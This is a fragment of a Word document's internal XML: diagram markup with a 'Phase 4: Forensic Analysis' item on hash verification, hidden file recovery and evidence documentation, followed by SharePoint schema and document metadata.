            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="291613" y="1569568"/>
        <a:ext cx="3805894" cy="319654"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{82C25B21-4814-4731-9980-34AA202C317E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2472165"/>
          <a:ext cx="5486400" cy="661500"/>
        </a:xfrm>
        <a:prstGeom prst="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249936" rIns="425806" bIns="85344" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="533400">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" b="0" i="0" kern="1200"/>
            <a:t>Hash verification, hidden file recovery, and evidence documentation (MD5, Autopsy, Steganography)</a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2472165"/>
        <a:ext cx="5486400" cy="661500"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{77B95E59-324E-4DF3-A939-A41E460783A3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="274320" y="2295045"/>
          <a:ext cx="3840480" cy="35424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en-IN" sz="1200" b="1" kern="1200"/>
            <a:t>Phase 4 : </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" b="1" i="0" kern="1200"/>
            <a:t>Forensic Analysis </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1200" b="1" kern="1200"/>
            <a:t> </a:t>
          </a:r>
          <a:endParaRPr lang="en-DE" sz="1200" b="1" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="291613" y="2312338"/>
        <a:ext cx="3805894" cy="31965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779B0CBCED2D84F93208A996C45FB6D" ma:contentTypeVersion="3" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="eb85de84c30937425dff52e0ffc9f129">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="783bf20e-a174-4c50-bbfc-90f0405dcb4c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="21932423226b8e80230bfc08bf107091" ns2:_="">
    <xsd:import namespace="783bf20e-a174-4c50-bbfc-90f0405dcb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bf20e-a174-4c50-bbfc-90f0405dcb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212CB1-FAA2-4EA4-8382-D8B2B728D475}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C36872E1-B147-451A-B386-18AE70ECAA73}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{37DA2776-949B-492E-A066-242FE4A540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C42E1B6-C3E2-4DC3-9C78-C5A47213B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bf20e-a174-4c50-bbfc-90f0405dcb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4326</Words>
  <Characters>27863</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>995</Lines>
  <Paragraphs>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Mahesh Azhagumuthu</dc:creator>
  <cp:lastModifiedBy>Ruchi Giradkar</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <cp:lastPrinted>2022-01-13T02:02:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-15T20:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-24T13:12:00Z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0x0101004779B0CBCED2D84F93208A996C45FB6D</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>